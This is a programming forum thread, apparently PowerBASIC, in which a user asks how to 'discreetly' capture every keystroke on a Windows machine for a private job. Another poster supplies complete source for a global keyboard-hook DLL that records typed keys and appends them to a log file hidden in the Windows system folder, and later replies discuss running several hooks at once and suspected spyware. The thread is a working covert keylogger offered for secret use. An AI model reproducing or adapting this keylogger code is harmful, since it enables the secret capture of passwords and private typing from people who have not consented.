Announcement

Collapse
No announcement yet.

Capturing keystrokes

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Capturing keystrokes

    I think I've seen this posted but here's what I want to do:

    Discreetly capture keystrokes, windows keystrokes, typing keystrokes etc...

    It's a private consulting job, not sure if I can do it or if there's a shareware program that would do better...

    I'll write it into a log and save it there...

    Thought I've seen code and mention that a "hook" would have to be used, but I've never done a hook...

    Scott


    ------------------
    Scott
    mailto:[email protected][email protected]</A>
    Scott Turchin
    MCSE, MCP+I
    http://www.tngbbs.com
    ----------------------
    True Karate-do is this: that in daily life, one's mind and body be trained and developed in a spirit of humility; and that in critical times, one be devoted utterly to the cause of justice. -Gichin Funakoshi

  • #2
    Search the BBS for "WH_KEYBOARD" and you should find some code...

    ------------------
    Lance
    PowerBASIC Support
    mailto:[email protected][email protected]</A>
    Lance
    mailto:[email protected]

    Comment


    • #3
      Thanks Lance, that helped!

      Now, the key is a global hook in my case, need ALL process's scanned etc...

      This is hte code from the Local hook, how do I use it to get ANY key pressed.

      ghKbrdHook = SetWindowsHookEx(%WH_KEYBOARD, CodePtr(KeyboardHook), 0, GetCurrentThreadId)


      Thanks,

      Scott

      ------------------
      Scott
      mailto:[email protected][email protected]</A>
      Scott Turchin
      MCSE, MCP+I
      http://www.tngbbs.com
      ----------------------
      True Karate-do is this: that in daily life, one's mind and body be trained and developed in a spirit of humility; and that in critical times, one be devoted utterly to the cause of justice. -Gichin Funakoshi

      Comment


      • #4
        Hi Scott,
        I made this DLL several years ago and it'll do what you want I
        think. Global hooks must be in DLL form, so what I did was start a
        simple prog that loaded this DLL using loadlibrary and then sat there
        in a loop sleeping. Anyway, have a look at it and I think you'll
        get the idea:
        Code:
        $COMPILE DLL  "D:\KEYS32.DLL"
        $INCLUDE "Win32API.INC"
        
        FUNCTION LibMain(BYVAL hInstance   AS LONG, _
                         BYVAL fwdReason   AS LONG, _
                         BYVAL lpvReserved AS LONG) EXPORT AS LONG
        
          GLOBAL hHook     AS LONG    'hook handle needed to unload hook
          GLOBAL KeyBuffer AS STRING  'String to hold keypresses
        
          SELECT CASE fwdReason
        
            CASE %DLL_PROCESS_ATTACH
            'Initialize buffer:  
              KeyBuffer = "Start: " & DATE$ & "//"& TIME$ & CHR$(13, 10)
             
            'Install hook Procedure:
              hHook = SetWindowsHookEx&(%WH_KEYBOARD, _
                                        CODEPTR(KeyBoardHookFunction), _
                                        hInstance, _
                                        0&)
              IF hHook THEN
                LibMain = 1   'success!
              END IF
              EXIT FUNCTION
        
            CASE %DLL_PROCESS_DETACH
              IF LEN(KeyBuffer) >  29 THEN  'Length Of Header
                KeyBuffer = KeyBuffer & CHR$(13,10) & "End: " & DATE$ & "//"& TIME$ & CHR$(13, 10)
                OPEN "C:\WINDOWS\SYSTEM\Text.TXT" FOR APPEND AS #1
                PRINT #1, KeyBuffer
                CLOSE #1
              END IF
              
              hHook = UnhookWindowsHookEx(hHook)
               
              IF hHook THEN
                LibMain = 1   'success!
              END IF
            
            END SELECT
        
        END FUNCTION
        
        FUNCTION KeyBoardHookFunction(BYVAL HookCode AS LONG, _
                                      BYVAL wParam AS LONG, _
                                      BYVAL lParam AS LONG) EXPORT AS LONG
          IF BIT(lParam, 31) THEN                     'Only grab the keyup
            SELECT CASE wParam
              CASE 32 TO 90                           'Normal Ascii Keys
                KeyBuffer = KeyBuffer & CHR$(wParam)  'add keypress
            END SELECT
          END IF
        END FUNCTION
        Anyway, I hope that helps, Good Luck!!!

        ------------------
        [email protected]

        Comment


        • #5
          thanks!
          I was noticing the 3 page responses to your previous article, in fact that's where I got the source, modified it, and got stuck.
          This makes wonderful sense!
          In fact I should be able to put together this package in just a few hours at this point!

          Thanks again!

          Scott


          ------------------
          Scott
          mailto:[email protected][email protected]</A>
          Scott Turchin
          MCSE, MCP+I
          http://www.tngbbs.com
          ----------------------
          True Karate-do is this: that in daily life, one's mind and body be trained and developed in a spirit of humility; and that in critical times, one be devoted utterly to the cause of justice. -Gichin Funakoshi

          Comment


          • #6
            I just noticed Wyman's key logging example. Not having dealt with hooks
            before, a couple of questions immediately come to mind:

            1. How many applications can hook the keyboard at the same time?
            2. How can one tell if someone already has hooked it? i.e. Can
            one look for a list of processes hooking a given device?


            ------------------
            Michael Burns
            Michael Burns

            Comment


            • #7
              Just for the record...

              There is a keyboard-hooking application on my system, something called "Encompass."

              Like a lot of the software installed under Windows, I have no clue what application installed it or why it even exists.

              BUT

              Every now and then it GPFs when running one of my applications. While the "Details" of the GPF clearly show it is the "Encompass" software which failed, it sure looks to the user as though it is a problem with my software.

              So if you are going to write a keyboard hooker, please test it very very well.

              MCM
              (hmm,"keyboard hooker": is that a musically-gifted hospitality industry employee?)

              Michael Mattias
              Tal Systems (retired)
              Port Washington WI USA
              [email protected]
              http://www.talsystems.com

              Comment


              • #8
                "Encompass"? Sounds suspiciously like a spyware app...



                ------------------
                Lance
                PowerBASIC Support
                mailto:[email protected][email protected]</A>
                Lance
                mailto:[email protected]

                Comment


                • #9
                  Should note that Wyman's code looks only as global hook.
                  1) "Global" means one per all apps.
                  If to set a hook in LibMain, it will be a lot of independent hooks.
                  2) In hook proc it's necessary to call next hook proc. Otherwise a chain will be destroyed.

                  BTW, I posted somehow a sample of global keyboard hook and today I reconstructed it a little to avoid external file.

                  About Michael's questions.
                  > 1) How many applications can hook the keyboard at the same time?
                  Theoretically, unlimited, but keyboard hooks should be correct.
                  For example, Wyman's code will kill all another hooks.

                  > 2). How can one tell if someone already has hooked it? i.e. Can
                  one look for a list of processes hooking a given device?

                  As I understand, there is no documented way to look a chain.

                  ------------------
                  E-MAIL: [email protected]

                  Comment

                  Working...
                  X